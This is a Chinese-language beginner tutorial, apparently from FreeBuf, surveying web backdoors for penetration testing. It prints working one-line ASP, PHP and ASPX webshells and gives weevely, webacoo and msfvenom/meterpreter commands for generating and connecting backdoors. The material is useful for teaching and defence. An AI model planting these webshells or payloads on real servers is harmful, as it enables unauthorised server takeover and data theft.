當前位置:
首頁 > 新聞 > 【新手科普】盤點常見的Web後門

【新手科普】盤點常見的Web後門

在對一個web站點進行滲透測試的滲透攻擊階段,一般會想辦法突破上傳限制,向目標可執行目錄中寫入一個帶有攻擊性質的腳本來協助獲取更大的伺服器許可權。


這裡我們就一起來盤點一下常用的web後門吧!


大馬與小馬


在幾年前很流行的網站入侵打油詩中有寫:



進谷歌 找注入

沒注入 就旁註


沒旁註 用0day

沒0day 猜目錄


沒目錄 就嗅探


爆賬戶 找後台


傳小馬 放大馬


拿許可權 掛頁面


放暗鏈 清數據


清日誌 留後門


其中的傳小馬上大馬就是我們要說的小馬大馬了,小馬的功能一般都比較單一,作用一般是向伺服器中寫入文件數據。


因為其功能單一的特性,隱蔽性通常都比較高。有些網站對上傳文件大小做了限制,小馬因為佔用空間也小也能繞過這些限制。


這裡貼一個php小馬



大馬一般就提供了更多的功能,例如輔助提權,執行sql語句,反彈shell等。


不過網上很多的大馬都加了後門,例如圖中的這款從mumaasp.com這個網站下載的一款大馬會將木馬的地址和密碼提交到

http://www.mumaasp.com/xz/sx.asp

這個網址



中國菜刀



中國菜刀和一句話木馬想必是大家最熟悉的了,中國菜刀支持asp、php、asp.net和jsp等web編程語言,小巧的中國菜刀還自帶了很多實用的功能。


例如虛擬終端



還有例如安全掃描,定時鬧鐘,資料庫管理等功能,甚至內置了一個網頁瀏覽器。


使用方法也很簡單,就是往目標web伺服器上傳相應的一句話木馬。


asp一句話木馬:



<%execute(request(

"pass"

))%>


php一句話木馬:



@

eval

($_POST[pass]);

?>


aspx一句話木馬:



<

%@

Page

Language

=

"Jscript"%

>

<

%eval(Request.Item["pass"])%

>


網上也有很多仿冒中國菜刀的官網發布加了後門的中國菜刀。


在linux下也有很多替代中國菜刀的開源產品,例如中國蟻劍和C刀。


Weevely


在kali linux中,我們用的比較多的就是這款php後門管理工具 weevely了。


Weevely支持的功能很強大,使用http頭進行指令傳輸。唯一的缺陷就是只支持php。



我們通過幫助可以看到,weevely的使用還是很簡單的,首先我們在/root目錄下生成一個名為weevely.php密碼為123的backdoor agent。



weevely generate 123 /root/weevely.php


然後我們只要上傳到目標伺服器之後運行



weevely <目標URL> <密碼>

就能成功連接上了



metasploit


metasploit框架中其實也自帶了php的後門,並且配合meterpreter功能強大。


在這裡提一下正向連接和反向連接(bind_tcp reverse_tcp)


bind_tcp:在這裡黑客主動去連接目標主機,就叫作正向連接。適用的情況是伺服器在外網的情況。


reverse_tcp:在這個例子中反向連接就是被入侵的主機反過來來連接黑客,就叫作反向連接,在目標伺服器在內網或有防火牆的情況下使用。



msfvenom -p php

/meterpreter/

bind_tcp lhost=

172.24.3.20

lport=

4444

-o

/root/

msf.php


其中lhost為目標伺服器的地址 lport是目標伺服器會開放的埠 -o後面是後門輸出的路徑。


然後進入msfconsole



選擇exploit/multi/handler這個模塊


然後設置payload為php/meterpreter/bind_tcp


最後設置一下目標的ip然後輸入run開始監聽


觸發木馬的方法就是訪問後門的網址


然後msfconsole如果有連接信息說明已經連接成功



?使用方式可以參考meterpreter


參考鏈接](http://www.evil0x.com/posts/838.html


webacoo


webacoo是用base64編碼後隱藏在Cookie頭中,隱蔽性較強,webacoo的缺點是不能指定密碼,所以。。。不推薦作為持續性攻擊的許可權維持的選擇



webacoo -g -o /root/webacoo.php


生成webacoo.php存放在/root目錄下



上傳成功之後用命令



webacoo -t -u 來連接



成功後會生成一個模擬終端,可以使用load命令來載入模塊,之後可以進行上傳下載,連接資料庫等操作。


只是不能設置密碼是個硬傷。


參考網站:

http://www.jb51.net/article/30234.htm


*本文作者:你會忘了我,轉載請註明來自FreeBuf



喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 FreeBuf 的精彩文章:

FreeTalk安全沙龍 | 全國巡演議題徵集
一種結合了點擊劫持、Self-XSS、複製粘貼劫持的新型XSS攻擊
智能模糊測試工具Peach Fuzzer官方文檔翻譯 | 內附資源
次世代SIEM?IBM眼中的SOAPA
八大熱門在線黑客學習課程合集 | 八合一僅售39美元

TAG:FreeBuf |

您可能感興趣

Select Shop | 全球極具特色的買手店大盤點(英國篇)
盤點中日韓在YouTube上的吃播們
美國新任第一夫人Melania,時尚穿衣大盤點
盤點《Fate》語錄:你是我的Master嗎?
盤點!美國七大Shopping Mall!
Yeezy Season 邀請函大盤點
盤點:那些雷人的cosplay搞笑
Supreme x CDG的聯名系列大盤點
《愛樂之城》穿搭盤點 最美的Emma Stone都在這裡了
十大愚人科技新聞盤點
《Running Man》精彩特輯大盤點——間諜類
泰國最清新脫俗網紅pimtha,時尚穿衣秘籍大盤點
泰國最清新脫俗網紅pimtha, 時尚穿衣秘籍大盤點
大帥比Spencer Nuzzi 的新贊助?奇葩贊助大盤點!
盤點NBA史上五大新秀人物
《美女與野獸》の Emma Waston造型盤點
折扣驚人的Kohl s黑五海報亮點搶先看!性價比超高的好物大盤點!
大量新情報!AnimeJapan2017公開消息盤點
NBA:盤點科比的5大神級隊友